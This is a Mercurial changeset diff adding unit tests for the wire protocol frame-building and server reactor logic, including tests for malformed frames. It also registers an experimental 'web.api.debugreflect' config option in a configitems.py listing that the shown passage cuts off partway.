##// END OF EJS Templates
wireproto: implement basic frame reading and processing...
Gregory Szorc -
r37070:8c3c4736 default
parent child Browse files
Show More
@@ -0,0 +1,275 b''
1 from __future__ import absolute_import, print_function
2
3 import unittest
4
5 from mercurial import (
6 util,
7 wireprotoframing as framing,
8 )
9
10 ffs = framing.makeframefromhumanstring
11
12 def makereactor():
13 return framing.serverreactor()
14
15 def sendframes(reactor, gen):
16 """Send a generator of frame bytearray to a reactor.
17
18 Emits a generator of results from ``onframerecv()`` calls.
19 """
20 for frame in gen:
21 frametype, frameflags, framelength = framing.parseheader(frame)
22 payload = frame[framing.FRAME_HEADER_SIZE:]
23 assert len(payload) == framelength
24
25 yield reactor.onframerecv(frametype, frameflags, payload)
26
27 def sendcommandframes(reactor, cmd, args, datafh=None):
28 """Generate frames to run a command and send them to a reactor."""
29 return sendframes(reactor, framing.createcommandframes(cmd, args, datafh))
30
31 class FrameTests(unittest.TestCase):
32 def testdataexactframesize(self):
33 data = util.bytesio(b'x' * framing.DEFAULT_MAX_FRAME_SIZE)
34
35 frames = list(framing.createcommandframes(b'command', {}, data))
36 self.assertEqual(frames, [
37 ffs(b'command-name have-data command'),
38 ffs(b'command-data continuation %s' % data.getvalue()),
39 ffs(b'command-data eos ')
40 ])
41
42 def testdatamultipleframes(self):
43 data = util.bytesio(b'x' * (framing.DEFAULT_MAX_FRAME_SIZE + 1))
44 frames = list(framing.createcommandframes(b'command', {}, data))
45 self.assertEqual(frames, [
46 ffs(b'command-name have-data command'),
47 ffs(b'command-data continuation %s' % (
48 b'x' * framing.DEFAULT_MAX_FRAME_SIZE)),
49 ffs(b'command-data eos x'),
50 ])
51
52 def testargsanddata(self):
53 data = util.bytesio(b'x' * 100)
54
55 frames = list(framing.createcommandframes(b'command', {
56 b'key1': b'key1value',
57 b'key2': b'key2value',
58 b'key3': b'key3value',
59 }, data))
60
61 self.assertEqual(frames, [
62 ffs(b'command-name have-args|have-data command'),
63 ffs(br'command-argument 0 \x04\x00\x09\x00key1key1value'),
64 ffs(br'command-argument 0 \x04\x00\x09\x00key2key2value'),
65 ffs(br'command-argument eoa \x04\x00\x09\x00key3key3value'),
66 ffs(b'command-data eos %s' % data.getvalue()),
67 ])
68
69 class ServerReactorTests(unittest.TestCase):
70 def _sendsingleframe(self, reactor, s):
71 results = list(sendframes(reactor, [ffs(s)]))
72 self.assertEqual(len(results), 1)
73
74 return results[0]
75
76 def assertaction(self, res, expected):
77 self.assertIsInstance(res, tuple)
78 self.assertEqual(len(res), 2)
79 self.assertIsInstance(res[1], dict)
80 self.assertEqual(res[0], expected)
81
82 def test1framecommand(self):
83 """Receiving a command in a single frame yields request to run it."""
84 reactor = makereactor()
85 results = list(sendcommandframes(reactor, b'mycommand', {}))
86 self.assertEqual(len(results), 1)
87 self.assertaction(results[0], 'runcommand')
88 self.assertEqual(results[0][1], {
89 'command': b'mycommand',
90 'args': {},
91 'data': None,
92 })
93
94 def test1argument(self):
95 reactor = makereactor()
96 results = list(sendcommandframes(reactor, b'mycommand',
97 {b'foo': b'bar'}))
98 self.assertEqual(len(results), 2)
99 self.assertaction(results[0], 'wantframe')
100 self.assertaction(results[1], 'runcommand')
101 self.assertEqual(results[1][1], {
102 'command': b'mycommand',
103 'args': {b'foo': b'bar'},
104 'data': None,
105 })
106
107 def testmultiarguments(self):
108 reactor = makereactor()
109 results = list(sendcommandframes(reactor, b'mycommand',
110 {b'foo': b'bar', b'biz': b'baz'}))
111 self.assertEqual(len(results), 3)
112 self.assertaction(results[0], 'wantframe')
113 self.assertaction(results[1], 'wantframe')
114 self.assertaction(results[2], 'runcommand')
115 self.assertEqual(results[2][1], {
116 'command': b'mycommand',
117 'args': {b'foo': b'bar', b'biz': b'baz'},
118 'data': None,
119 })
120
121 def testsimplecommanddata(self):
122 reactor = makereactor()
123 results = list(sendcommandframes(reactor, b'mycommand', {},
124 util.bytesio(b'data!')))
125 self.assertEqual(len(results), 2)
126 self.assertaction(results[0], 'wantframe')
127 self.assertaction(results[1], 'runcommand')
128 self.assertEqual(results[1][1], {
129 'command': b'mycommand',
130 'args': {},
131 'data': b'data!',
132 })
133
134 def testmultipledataframes(self):
135 frames = [
136 ffs(b'command-name have-data mycommand'),
137 ffs(b'command-data continuation data1'),
138 ffs(b'command-data continuation data2'),
139 ffs(b'command-data eos data3'),
140 ]
141
142 reactor = makereactor()
143 results = list(sendframes(reactor, frames))
144 self.assertEqual(len(results), 4)
145 for i in range(3):
146 self.assertaction(results[i], 'wantframe')
147 self.assertaction(results[3], 'runcommand')
148 self.assertEqual(results[3][1], {
149 'command': b'mycommand',
150 'args': {},
151 'data': b'data1data2data3',
152 })
153
154 def testargumentanddata(self):
155 frames = [
156 ffs(b'command-name have-args|have-data command'),
157 ffs(br'command-argument 0 \x03\x00\x03\x00keyval'),
158 ffs(br'command-argument eoa \x03\x00\x03\x00foobar'),
159 ffs(b'command-data continuation value1'),
160 ffs(b'command-data eos value2'),
161 ]
162
163 reactor = makereactor()
164 results = list(sendframes(reactor, frames))
165
166 self.assertaction(results[-1], 'runcommand')
167 self.assertEqual(results[-1][1], {
168 'command': b'command',
169 'args': {
170 b'key': b'val',
171 b'foo': b'bar',
172 },
173 'data': b'value1value2',
174 })
175
176 def testunexpectedcommandargument(self):
177 """Command argument frame when not running a command is an error."""
178 result = self._sendsingleframe(makereactor(),
179 b'command-argument 0 ignored')
180 self.assertaction(result, 'error')
181 self.assertEqual(result[1], {
182 'message': b'expected command frame; got 2',
183 })
184
185 def testunexpectedcommanddata(self):
186 """Command argument frame when not running a command is an error."""
187 result = self._sendsingleframe(makereactor(),
188 b'command-data 0 ignored')
189 self.assertaction(result, 'error')
190 self.assertEqual(result[1], {
191 'message': b'expected command frame; got 3',
192 })
193
194 def testmissingcommandframeflags(self):
195 """Command name frame must have flags set."""
196 result = self._sendsingleframe(makereactor(),
197 b'command-name 0 command')
198 self.assertaction(result, 'error')
199 self.assertEqual(result[1], {
200 'message': b'missing frame flags on command frame',
201 })
202
203 def testmissingargumentframe(self):
204 frames = [
205 ffs(b'command-name have-args command'),
206 ffs(b'command-name 0 ignored'),
207 ]
208
209 results = list(sendframes(makereactor(), frames))
210 self.assertEqual(len(results), 2)
211 self.assertaction(results[0], 'wantframe')
212 self.assertaction(results[1], 'error')
213 self.assertEqual(results[1][1], {
214 'message': b'expected command argument frame; got 1',
215 })
216
217 def testincompleteargumentname(self):
218 """Argument frame with incomplete name."""
219 frames = [
220 ffs(b'command-name have-args command1'),
221 ffs(br'command-argument eoa \x04\x00\xde\xadfoo'),
222 ]
223
224 results = list(sendframes(makereactor(), frames))
225 self.assertEqual(len(results), 2)
226 self.assertaction(results[0], 'wantframe')
227 self.assertaction(results[1], 'error')
228 self.assertEqual(results[1][1], {
229 'message': b'malformed argument frame: partial argument name',
230 })
231
232 def testincompleteargumentvalue(self):
233 """Argument frame with incomplete value."""
234 frames = [
235 ffs(b'command-name have-args command'),
236 ffs(br'command-argument eoa \x03\x00\xaa\xaafoopartialvalue'),
237 ]
238
239 results = list(sendframes(makereactor(), frames))
240 self.assertEqual(len(results), 2)
241 self.assertaction(results[0], 'wantframe')
242 self.assertaction(results[1], 'error')
243 self.assertEqual(results[1][1], {
244 'message': b'malformed argument frame: partial argument value',
245 })
246
247 def testmissingcommanddataframe(self):
248 frames = [
249 ffs(b'command-name have-data command1'),
250 ffs(b'command-name eos command2'),
251 ]
252 results = list(sendframes(makereactor(), frames))
253 self.assertEqual(len(results), 2)
254 self.assertaction(results[0], 'wantframe')
255 self.assertaction(results[1], 'error')
256 self.assertEqual(results[1][1], {
257 'message': b'expected command data frame; got 1',
258 })
259
260 def testmissingcommanddataframeflags(self):
261 frames = [
262 ffs(b'command-name have-data command1'),
263 ffs(b'command-data 0 data'),
264 ]
265 results = list(sendframes(makereactor(), frames))
266 self.assertEqual(len(results), 2)
267 self.assertaction(results[0], 'wantframe')
268 self.assertaction(results[1], 'error')
269 self.assertEqual(results[1][1], {
270 'message': b'command data frame without flags',
271 })
272
273 if __name__ == '__main__':
274 import silenttestrunner
275 silenttestrunner.main(__name__)
@@ -1,1317 +1,1320 b''
1 1 # configitems.py - centralized declaration of configuration option
2 2 #
3 3 # Copyright 2017 Pierre-Yves David <pierre-yves.david@octobus.net>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import
9 9
10 10 import functools
11 11 import re
12 12
13 13 from . import (
14 14 encoding,
15 15 error,
16 16 )
17 17
18 18 def loadconfigtable(ui, extname, configtable):
19 19 """update config item known to the ui with the extension ones"""
20 20 for section, items in sorted(configtable.items()):
21 21 knownitems = ui._knownconfig.setdefault(section, itemregister())
22 22 knownkeys = set(knownitems)
23 23 newkeys = set(items)
24 24 for key in sorted(knownkeys & newkeys):
25 25 msg = "extension '%s' overwrite config item '%s.%s'"
26 26 msg %= (extname, section, key)
27 27 ui.develwarn(msg, config='warn-config')
28 28
29 29 knownitems.update(items)
30 30
31 31 class configitem(object):
32 32 """represent a known config item
33 33
34 34 :section: the official config section where to find this item,
35 35 :name: the official name within the section,
36 36 :default: default value for this item,
37 37 :alias: optional list of tuples as alternatives,
38 38 :generic: this is a generic definition, match name using regular expression.
39 39 """
40 40
41 41 def __init__(self, section, name, default=None, alias=(),
42 42 generic=False, priority=0):
43 43 self.section = section
44 44 self.name = name
45 45 self.default = default
46 46 self.alias = list(alias)
47 47 self.generic = generic
48 48 self.priority = priority
49 49 self._re = None
50 50 if generic:
51 51 self._re = re.compile(self.name)
52 52
53 53 class itemregister(dict):
54 54 """A specialized dictionary that can handle wild-card selection"""
55 55
56 56 def __init__(self):
57 57 super(itemregister, self).__init__()
58 58 self._generics = set()
59 59
60 60 def update(self, other):
61 61 super(itemregister, self).update(other)
62 62 self._generics.update(other._generics)
63 63
64 64 def __setitem__(self, key, item):
65 65 super(itemregister, self).__setitem__(key, item)
66 66 if item.generic:
67 67 self._generics.add(item)
68 68
69 69 def get(self, key):
70 70 baseitem = super(itemregister, self).get(key)
71 71 if baseitem is not None and not baseitem.generic:
72 72 return baseitem
73 73
74 74 # search for a matching generic item
75 75 generics = sorted(self._generics, key=(lambda x: (x.priority, x.name)))
76 76 for item in generics:
77 77 # we use 'match' instead of 'search' to make the matching simpler
78 78 # for people unfamiliar with regular expression. Having the match
79 79 # rooted to the start of the string will produce less surprising
80 80 # result for user writing simple regex for sub-attribute.
81 81 #
82 82 # For example using "color\..*" match produces an unsurprising
83 83 # result, while using search could suddenly match apparently
84 84 # unrelated configuration that happens to contains "color."
85 85 # anywhere. This is a tradeoff where we favor requiring ".*" on
86 86 # some match to avoid the need to prefix most pattern with "^".
87 87 # The "^" seems more error prone.
88 88 if item._re.match(key):
89 89 return item
90 90
91 91 return None
92 92
93 93 coreitems = {}
94 94
95 95 def _register(configtable, *args, **kwargs):
96 96 item = configitem(*args, **kwargs)
97 97 section = configtable.setdefault(item.section, itemregister())
98 98 if item.name in section:
99 99 msg = "duplicated config item registration for '%s.%s'"
100 100 raise error.ProgrammingError(msg % (item.section, item.name))
101 101 section[item.name] = item
102 102
103 103 # special value for case where the default is derived from other values
104 104 dynamicdefault = object()
105 105
106 106 # Registering actual config items
107 107
108 108 def getitemregister(configtable):
109 109 f = functools.partial(_register, configtable)
110 110 # export pseudo enum as configitem.*
111 111 f.dynamicdefault = dynamicdefault
112 112 return f
113 113
114 114 coreconfigitem = getitemregister(coreitems)
115 115
116 116 coreconfigitem('alias', '.*',
117 117 default=None,
118 118 generic=True,
119 119 )
120 120 coreconfigitem('annotate', 'nodates',
121 121 default=False,
122 122 )
123 123 coreconfigitem('annotate', 'showfunc',
124 124 default=False,
125 125 )
126 126 coreconfigitem('annotate', 'unified',
127 127 default=None,
128 128 )
129 129 coreconfigitem('annotate', 'git',
130 130 default=False,
131 131 )
132 132 coreconfigitem('annotate', 'ignorews',
133 133 default=False,
134 134 )
135 135 coreconfigitem('annotate', 'ignorewsamount',
136 136 default=False,
137 137 )
138 138 coreconfigitem('annotate', 'ignoreblanklines',
139 139 default=False,
140 140 )
141 141 coreconfigitem('annotate', 'ignorewseol',
142 142 default=False,
143 143 )
144 144 coreconfigitem('annotate', 'nobinary',
145 145 default=False,
146 146 )
147 147 coreconfigitem('annotate', 'noprefix',
148 148 default=False,
149 149 )
150 150 coreconfigitem('auth', 'cookiefile',
151 151 default=None,
152 152 )
153 153 # bookmarks.pushing: internal hack for discovery
154 154 coreconfigitem('bookmarks', 'pushing',
155 155 default=list,
156 156 )
157 157 # bundle.mainreporoot: internal hack for bundlerepo
158 158 coreconfigitem('bundle', 'mainreporoot',
159 159 default='',
160 160 )
161 161 # bundle.reorder: experimental config
162 162 coreconfigitem('bundle', 'reorder',
163 163 default='auto',
164 164 )
165 165 coreconfigitem('censor', 'policy',
166 166 default='abort',
167 167 )
168 168 coreconfigitem('chgserver', 'idletimeout',
169 169 default=3600,
170 170 )
171 171 coreconfigitem('chgserver', 'skiphash',
172 172 default=False,
173 173 )
174 174 coreconfigitem('cmdserver', 'log',
175 175 default=None,
176 176 )
177 177 coreconfigitem('color', '.*',
178 178 default=None,
179 179 generic=True,
180 180 )
181 181 coreconfigitem('color', 'mode',
182 182 default='auto',
183 183 )
184 184 coreconfigitem('color', 'pagermode',
185 185 default=dynamicdefault,
186 186 )
187 187 coreconfigitem('commands', 'show.aliasprefix',
188 188 default=list,
189 189 )
190 190 coreconfigitem('commands', 'status.relative',
191 191 default=False,
192 192 )
193 193 coreconfigitem('commands', 'status.skipstates',
194 194 default=[],
195 195 )
196 196 coreconfigitem('commands', 'status.verbose',
197 197 default=False,
198 198 )
199 199 coreconfigitem('commands', 'update.check',
200 200 default=None,
201 201 # Deprecated, remove after 4.4 release
202 202 alias=[('experimental', 'updatecheck')]
203 203 )
204 204 coreconfigitem('commands', 'update.requiredest',
205 205 default=False,
206 206 )
207 207 coreconfigitem('committemplate', '.*',
208 208 default=None,
209 209 generic=True,
210 210 )
211 211 coreconfigitem('convert', 'cvsps.cache',
212 212 default=True,
213 213 )
214 214 coreconfigitem('convert', 'cvsps.fuzz',
215 215 default=60,
216 216 )
217 217 coreconfigitem('convert', 'cvsps.logencoding',
218 218 default=None,
219 219 )
220 220 coreconfigitem('convert', 'cvsps.mergefrom',
221 221 default=None,
222 222 )
223 223 coreconfigitem('convert', 'cvsps.mergeto',
224 224 default=None,
225 225 )
226 226 coreconfigitem('convert', 'git.committeractions',
227 227 default=lambda: ['messagedifferent'],
228 228 )
229 229 coreconfigitem('convert', 'git.extrakeys',
230 230 default=list,
231 231 )
232 232 coreconfigitem('convert', 'git.findcopiesharder',
233 233 default=False,
234 234 )
235 235 coreconfigitem('convert', 'git.remoteprefix',
236 236 default='remote',
237 237 )
238 238 coreconfigitem('convert', 'git.renamelimit',
239 239 default=400,
240 240 )
241 241 coreconfigitem('convert', 'git.saverev',
242 242 default=True,
243 243 )
244 244 coreconfigitem('convert', 'git.similarity',
245 245 default=50,
246 246 )
247 247 coreconfigitem('convert', 'git.skipsubmodules',
248 248 default=False,
249 249 )
250 250 coreconfigitem('convert', 'hg.clonebranches',
251 251 default=False,
252 252 )
253 253 coreconfigitem('convert', 'hg.ignoreerrors',
254 254 default=False,
255 255 )
256 256 coreconfigitem('convert', 'hg.revs',
257 257 default=None,
258 258 )
259 259 coreconfigitem('convert', 'hg.saverev',
260 260 default=False,
261 261 )
262 262 coreconfigitem('convert', 'hg.sourcename',
263 263 default=None,
264 264 )
265 265 coreconfigitem('convert', 'hg.startrev',
266 266 default=None,
267 267 )
268 268 coreconfigitem('convert', 'hg.tagsbranch',
269 269 default='default',
270 270 )
271 271 coreconfigitem('convert', 'hg.usebranchnames',
272 272 default=True,
273 273 )
274 274 coreconfigitem('convert', 'ignoreancestorcheck',
275 275 default=False,
276 276 )
277 277 coreconfigitem('convert', 'localtimezone',
278 278 default=False,
279 279 )
280 280 coreconfigitem('convert', 'p4.encoding',
281 281 default=dynamicdefault,
282 282 )
283 283 coreconfigitem('convert', 'p4.startrev',
284 284 default=0,
285 285 )
286 286 coreconfigitem('convert', 'skiptags',
287 287 default=False,
288 288 )
289 289 coreconfigitem('convert', 'svn.debugsvnlog',
290 290 default=True,
291 291 )
292 292 coreconfigitem('convert', 'svn.trunk',
293 293 default=None,
294 294 )
295 295 coreconfigitem('convert', 'svn.tags',
296 296 default=None,
297 297 )
298 298 coreconfigitem('convert', 'svn.branches',
299 299 default=None,
300 300 )
301 301 coreconfigitem('convert', 'svn.startrev',
302 302 default=0,
303 303 )
304 304 coreconfigitem('debug', 'dirstate.delaywrite',
305 305 default=0,
306 306 )
307 307 coreconfigitem('defaults', '.*',
308 308 default=None,
309 309 generic=True,
310 310 )
311 311 coreconfigitem('devel', 'all-warnings',
312 312 default=False,
313 313 )
314 314 coreconfigitem('devel', 'bundle2.debug',
315 315 default=False,
316 316 )
317 317 coreconfigitem('devel', 'cache-vfs',
318 318 default=None,
319 319 )
320 320 coreconfigitem('devel', 'check-locks',
321 321 default=False,
322 322 )
323 323 coreconfigitem('devel', 'check-relroot',
324 324 default=False,
325 325 )
326 326 coreconfigitem('devel', 'default-date',
327 327 default=None,
328 328 )
329 329 coreconfigitem('devel', 'deprec-warn',
330 330 default=False,
331 331 )
332 332 coreconfigitem('devel', 'disableloaddefaultcerts',
333 333 default=False,
334 334 )
335 335 coreconfigitem('devel', 'warn-empty-changegroup',
336 336 default=False,
337 337 )
338 338 coreconfigitem('devel', 'legacy.exchange',
339 339 default=list,
340 340 )
341 341 coreconfigitem('devel', 'servercafile',
342 342 default='',
343 343 )
344 344 coreconfigitem('devel', 'serverexactprotocol',
345 345 default='',
346 346 )
347 347 coreconfigitem('devel', 'serverrequirecert',
348 348 default=False,
349 349 )
350 350 coreconfigitem('devel', 'strip-obsmarkers',
351 351 default=True,
352 352 )
353 353 coreconfigitem('devel', 'warn-config',
354 354 default=None,
355 355 )
356 356 coreconfigitem('devel', 'warn-config-default',
357 357 default=None,
358 358 )
359 359 coreconfigitem('devel', 'user.obsmarker',
360 360 default=None,
361 361 )
362 362 coreconfigitem('devel', 'warn-config-unknown',
363 363 default=None,
364 364 )
365 365 coreconfigitem('devel', 'debug.peer-request',
366 366 default=False,
367 367 )
368 368 coreconfigitem('diff', 'nodates',
369 369 default=False,
370 370 )
371 371 coreconfigitem('diff', 'showfunc',
372 372 default=False,
373 373 )
374 374 coreconfigitem('diff', 'unified',
375 375 default=None,
376 376 )
377 377 coreconfigitem('diff', 'git',
378 378 default=False,
379 379 )
380 380 coreconfigitem('diff', 'ignorews',
381 381 default=False,
382 382 )
383 383 coreconfigitem('diff', 'ignorewsamount',
384 384 default=False,
385 385 )
386 386 coreconfigitem('diff', 'ignoreblanklines',
387 387 default=False,
388 388 )
389 389 coreconfigitem('diff', 'ignorewseol',
390 390 default=False,
391 391 )
392 392 coreconfigitem('diff', 'nobinary',
393 393 default=False,
394 394 )
395 395 coreconfigitem('diff', 'noprefix',
396 396 default=False,
397 397 )
398 398 coreconfigitem('email', 'bcc',
399 399 default=None,
400 400 )
401 401 coreconfigitem('email', 'cc',
402 402 default=None,
403 403 )
404 404 coreconfigitem('email', 'charsets',
405 405 default=list,
406 406 )
407 407 coreconfigitem('email', 'from',
408 408 default=None,
409 409 )
410 410 coreconfigitem('email', 'method',
411 411 default='smtp',
412 412 )
413 413 coreconfigitem('email', 'reply-to',
414 414 default=None,
415 415 )
416 416 coreconfigitem('email', 'to',
417 417 default=None,
418 418 )
419 419 coreconfigitem('experimental', 'archivemetatemplate',
420 420 default=dynamicdefault,
421 421 )
422 422 coreconfigitem('experimental', 'bundle-phases',
423 423 default=False,
424 424 )
425 425 coreconfigitem('experimental', 'bundle2-advertise',
426 426 default=True,
427 427 )
428 428 coreconfigitem('experimental', 'bundle2-output-capture',
429 429 default=False,
430 430 )
431 431 coreconfigitem('experimental', 'bundle2.pushback',
432 432 default=False,
433 433 )
434 434 coreconfigitem('experimental', 'bundle2.stream',
435 435 default=False,
436 436 )
437 437 coreconfigitem('experimental', 'bundle2lazylocking',
438 438 default=False,
439 439 )
440 440 coreconfigitem('experimental', 'bundlecomplevel',
441 441 default=None,
442 442 )
443 443 coreconfigitem('experimental', 'changegroup3',
444 444 default=False,
445 445 )
446 446 coreconfigitem('experimental', 'clientcompressionengines',
447 447 default=list,
448 448 )
449 449 coreconfigitem('experimental', 'copytrace',
450 450 default='on',
451 451 )
452 452 coreconfigitem('experimental', 'copytrace.movecandidateslimit',
453 453 default=100,
454 454 )
455 455 coreconfigitem('experimental', 'copytrace.sourcecommitlimit',
456 456 default=100,
457 457 )
458 458 coreconfigitem('experimental', 'crecordtest',
459 459 default=None,
460 460 )
461 461 coreconfigitem('experimental', 'directaccess',
462 462 default=False,
463 463 )
464 464 coreconfigitem('experimental', 'directaccess.revnums',
465 465 default=False,
466 466 )
467 467 coreconfigitem('experimental', 'editortmpinhg',
468 468 default=False,
469 469 )
470 470 coreconfigitem('experimental', 'evolution',
471 471 default=list,
472 472 )
473 473 coreconfigitem('experimental', 'evolution.allowdivergence',
474 474 default=False,
475 475 alias=[('experimental', 'allowdivergence')]
476 476 )
477 477 coreconfigitem('experimental', 'evolution.allowunstable',
478 478 default=None,
479 479 )
480 480 coreconfigitem('experimental', 'evolution.createmarkers',
481 481 default=None,
482 482 )
483 483 coreconfigitem('experimental', 'evolution.effect-flags',
484 484 default=True,
485 485 alias=[('experimental', 'effect-flags')]
486 486 )
487 487 coreconfigitem('experimental', 'evolution.exchange',
488 488 default=None,
489 489 )
490 490 coreconfigitem('experimental', 'evolution.bundle-obsmarker',
491 491 default=False,
492 492 )
493 493 coreconfigitem('experimental', 'evolution.report-instabilities',
494 494 default=True,
495 495 )
496 496 coreconfigitem('experimental', 'evolution.track-operation',
497 497 default=True,
498 498 )
499 499 coreconfigitem('experimental', 'worddiff',
500 500 default=False,
501 501 )
502 502 coreconfigitem('experimental', 'maxdeltachainspan',
503 503 default=-1,
504 504 )
505 505 coreconfigitem('experimental', 'mergetempdirprefix',
506 506 default=None,
507 507 )
508 508 coreconfigitem('experimental', 'mmapindexthreshold',
509 509 default=None,
510 510 )
511 511 coreconfigitem('experimental', 'nonnormalparanoidcheck',
512 512 default=False,
513 513 )
514 514 coreconfigitem('experimental', 'exportableenviron',
515 515 default=list,
516 516 )
517 517 coreconfigitem('experimental', 'extendedheader.index',
518 518 default=None,
519 519 )
520 520 coreconfigitem('experimental', 'extendedheader.similarity',
521 521 default=False,
522 522 )
523 523 coreconfigitem('experimental', 'format.compression',
524 524 default='zlib',
525 525 )
526 526 coreconfigitem('experimental', 'graphshorten',
527 527 default=False,
528 528 )
529 529 coreconfigitem('experimental', 'graphstyle.parent',
530 530 default=dynamicdefault,
531 531 )
532 532 coreconfigitem('experimental', 'graphstyle.missing',
533 533 default=dynamicdefault,
534 534 )
535 535 coreconfigitem('experimental', 'graphstyle.grandparent',
536 536 default=dynamicdefault,
537 537 )
538 538 coreconfigitem('experimental', 'hook-track-tags',
539 539 default=False,
540 540 )
541 541 coreconfigitem('experimental', 'httppostargs',
542 542 default=False,
543 543 )
544 544 coreconfigitem('experimental', 'mergedriver',
545 545 default=None,
546 546 )
547 547 coreconfigitem('experimental', 'obsmarkers-exchange-debug',
548 548 default=False,
549 549 )
550 550 coreconfigitem('experimental', 'remotenames',
551 551 default=False,
552 552 )
553 553 coreconfigitem('experimental', 'revlogv2',
554 554 default=None,
555 555 )
556 556 coreconfigitem('experimental', 'single-head-per-branch',
557 557 default=False,
558 558 )
559 559 coreconfigitem('experimental', 'sshserver.support-v2',
560 560 default=False,
561 561 )
562 562 coreconfigitem('experimental', 'spacemovesdown',
563 563 default=False,
564 564 )
565 565 coreconfigitem('experimental', 'sparse-read',
566 566 default=False,
567 567 )
568 568 coreconfigitem('experimental', 'sparse-read.density-threshold',
569 569 default=0.25,
570 570 )
571 571 coreconfigitem('experimental', 'sparse-read.min-gap-size',
572 572 default='256K',
573 573 )
574 574 coreconfigitem('experimental', 'treemanifest',
575 575 default=False,
576 576 )
577 577 coreconfigitem('experimental', 'update.atomic-file',
578 578 default=False,
579 579 )
580 580 coreconfigitem('experimental', 'sshpeer.advertise-v2',
581 581 default=False,
582 582 )
583 583 coreconfigitem('experimental', 'web.apiserver',
584 584 default=False,
585 585 )
586 586 coreconfigitem('experimental', 'web.api.http-v2',
587 587 default=False,
588 588 )
589 coreconfigitem('experimental', 'web.api.debugreflect',
590 default=False,
591 )
589 592 coreconfigitem('experimental', 'xdiff',
590 593 default=False,
591 594 )
592 595 coreconfigitem('extensions', '.*',
593 596 default=None,
594 597 generic=True,
595 598 )
596 599 coreconfigitem('extdata', '.*',
597 600 default=None,
598 601 generic=True,
599 602 )
600 603 coreconfigitem('format', 'aggressivemergedeltas',
601 604 default=False,
602 605 )
603 606 coreconfigitem('format', 'chunkcachesize',
604 607 default=None,
605 608 )
606 609 coreconfigitem('format', 'dotencode',
607 610 default=True,
608 611 )
609 612 coreconfigitem('format', 'generaldelta',
610 613 default=False,
611 614 )
612 615 coreconfigitem('format', 'manifestcachesize',
613 616 default=None,
614 617 )
615 618 coreconfigitem('format', 'maxchainlen',
616 619 default=None,
617 620 )
618 621 coreconfigitem('format', 'obsstore-version',
619 622 default=None,
620 623 )
621 624 coreconfigitem('format', 'usefncache',
622 625 default=True,
623 626 )
624 627 coreconfigitem('format', 'usegeneraldelta',
625 628 default=True,
626 629 )
627 630 coreconfigitem('format', 'usestore',
628 631 default=True,
629 632 )
630 633 coreconfigitem('fsmonitor', 'warn_when_unused',
631 634 default=True,
632 635 )
633 636 coreconfigitem('fsmonitor', 'warn_update_file_count',
634 637 default=50000,
635 638 )
636 639 coreconfigitem('hooks', '.*',
637 640 default=dynamicdefault,
638 641 generic=True,
639 642 )
640 643 coreconfigitem('hgweb-paths', '.*',
641 644 default=list,
642 645 generic=True,
643 646 )
644 647 coreconfigitem('hostfingerprints', '.*',
645 648 default=list,
646 649 generic=True,
647 650 )
648 651 coreconfigitem('hostsecurity', 'ciphers',
649 652 default=None,
650 653 )
651 654 coreconfigitem('hostsecurity', 'disabletls10warning',
652 655 default=False,
653 656 )
654 657 coreconfigitem('hostsecurity', 'minimumprotocol',
655 658 default=dynamicdefault,
656 659 )
657 660 coreconfigitem('hostsecurity', '.*:minimumprotocol$',
658 661 default=dynamicdefault,
659 662 generic=True,
660 663 )
661 664 coreconfigitem('hostsecurity', '.*:ciphers$',
662 665 default=dynamicdefault,
663 666 generic=True,
664 667 )
665 668 coreconfigitem('hostsecurity', '.*:fingerprints$',
666 669 default=list,
667 670 generic=True,
668 671 )
669 672 coreconfigitem('hostsecurity', '.*:verifycertsfile$',
670 673 default=None,
671 674 generic=True,
672 675 )
673 676
674 677 coreconfigitem('http_proxy', 'always',
675 678 default=False,
676 679 )
677 680 coreconfigitem('http_proxy', 'host',
678 681 default=None,
679 682 )
680 683 coreconfigitem('http_proxy', 'no',
681 684 default=list,
682 685 )
683 686 coreconfigitem('http_proxy', 'passwd',
684 687 default=None,
685 688 )
686 689 coreconfigitem('http_proxy', 'user',
687 690 default=None,
688 691 )
689 692 coreconfigitem('logtoprocess', 'commandexception',
690 693 default=None,
691 694 )
692 695 coreconfigitem('logtoprocess', 'commandfinish',
693 696 default=None,
694 697 )
695 698 coreconfigitem('logtoprocess', 'command',
696 699 default=None,
697 700 )
698 701 coreconfigitem('logtoprocess', 'develwarn',
699 702 default=None,
700 703 )
701 704 coreconfigitem('logtoprocess', 'uiblocked',
702 705 default=None,
703 706 )
704 707 coreconfigitem('merge', 'checkunknown',
705 708 default='abort',
706 709 )
707 710 coreconfigitem('merge', 'checkignored',
708 711 default='abort',
709 712 )
710 713 coreconfigitem('experimental', 'merge.checkpathconflicts',
711 714 default=False,
712 715 )
713 716 coreconfigitem('merge', 'followcopies',
714 717 default=True,
715 718 )
716 719 coreconfigitem('merge', 'on-failure',
717 720 default='continue',
718 721 )
719 722 coreconfigitem('merge', 'preferancestor',
720 723 default=lambda: ['*'],
721 724 )
722 725 coreconfigitem('merge-tools', '.*',
723 726 default=None,
724 727 generic=True,
725 728 )
726 729 coreconfigitem('merge-tools', br'.*\.args$',
727 730 default="$local $base $other",
728 731 generic=True,
729 732 priority=-1,
730 733 )
731 734 coreconfigitem('merge-tools', br'.*\.binary$',
732 735 default=False,
733 736 generic=True,
734 737 priority=-1,
735 738 )
736 739 coreconfigitem('merge-tools', br'.*\.check$',
737 740 default=list,
738 741 generic=True,
739 742 priority=-1,
740 743 )
741 744 coreconfigitem('merge-tools', br'.*\.checkchanged$',
742 745 default=False,
743 746 generic=True,
744 747 priority=-1,
745 748 )
746 749 coreconfigitem('merge-tools', br'.*\.executable$',
747 750 default=dynamicdefault,
748 751 generic=True,
749 752 priority=-1,
750 753 )
751 754 coreconfigitem('merge-tools', br'.*\.fixeol$',
752 755 default=False,
753 756 generic=True,
754 757 priority=-1,
755 758 )
756 759 coreconfigitem('merge-tools', br'.*\.gui$',
757 760 default=False,
758 761 generic=True,
759 762 priority=-1,
760 763 )
761 764 coreconfigitem('merge-tools', br'.*\.mergemarkers$',
762 765 default='basic',
763 766 generic=True,
764 767 priority=-1,
765 768 )
766 769 coreconfigitem('merge-tools', br'.*\.mergemarkertemplate$',
767 770 default=dynamicdefault, # take from ui.mergemarkertemplate
768 771 generic=True,
769 772 priority=-1,
770 773 )
771 774 coreconfigitem('merge-tools', br'.*\.priority$',
772 775 default=0,
773 776 generic=True,
774 777 priority=-1,
775 778 )
776 779 coreconfigitem('merge-tools', br'.*\.premerge$',
777 780 default=dynamicdefault,
778 781 generic=True,
779 782 priority=-1,
780 783 )
